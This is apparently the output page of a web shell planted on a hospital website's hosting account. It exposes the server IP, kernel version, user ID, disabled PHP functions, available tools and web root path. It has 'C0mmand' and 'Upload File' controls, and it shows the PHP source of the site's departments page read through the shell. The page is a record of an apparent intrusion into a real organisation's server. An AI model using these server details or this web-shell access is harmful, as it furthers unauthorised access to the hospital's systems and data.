|
Server IP : 82.197.83.136 / Your IP : 216.73.216.82 Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64 User : u163988420 ( 163988420) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0755) : /home/u163988420/domains/brshastrihospital.com/public_html/AACSITE/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php include 'header.php'; ?>
<section class="page-title page-title-layout5 text-center">
<div class="bg-img"><img src="assets/images/backgrounds/6.jpg" alt="background"></div>
<div class="container">
<div class="row">
<div class="col-12">
<h1 class="pagetitle__heading">Departments</h1>
<nav>
<ol class="breadcrumb justify-content-center mb-0">
<li class="breadcrumb-item"><a href="index.php">Home</a></li>
<li class="breadcrumb-item active" aria-current="page">Departments</li>
</ol>
</nav>
</div><!-- /.col-xl-6 -->
</div><!-- /.row -->
</div><!-- /.container -->
</section><!-- /.page-title -->
<section class="services-layout2 pt-130">
<div class="container">
<div class="row">
<div class="col-sm-12 col-md-12 col-lg-6 offset-lg-3">
<div class="heading text-center mb-60">
<h2 class="heading__subtitle">B.R SHASTRI HOSPITAL & RESEARCH CENTER</h2>
<h3 class="heading__title">The Best Medical And General Practice Care!</h3>
</div><!-- /.heading -->
</div><!-- /.col-lg-6 -->
</div><!-- /.row -->
<div class="row">
<?php
$sel = "SELECT * FROM department";
$res = mysqli_query($con,$sel);
while($r = mysqli_fetch_array($res))
{
?>
<!-- service item #1 -->
<div class="col-sm-12 col-md-6 col-lg-4">
<div class="service-item">
<div class="service__img">
<img src="br-admin/uploads/department/<?php echo $r[2]; ?>" alt="img" style="height:250px";>
</div><!-- /.service__img -->
<div class="service__content">
<h4 class="service__title"><?php echo $r[1]; ?></h4>
</div><!-- /.service__content -->
</div><!-- /.service-item -->
</div><!-- /.col-lg-4 -->
<?php
}
?>
</div><!-- /.row -->
</div><!-- /.container -->
</section><!-- /.Services Layout 2 -->
<?php include 'footer.php'; ?>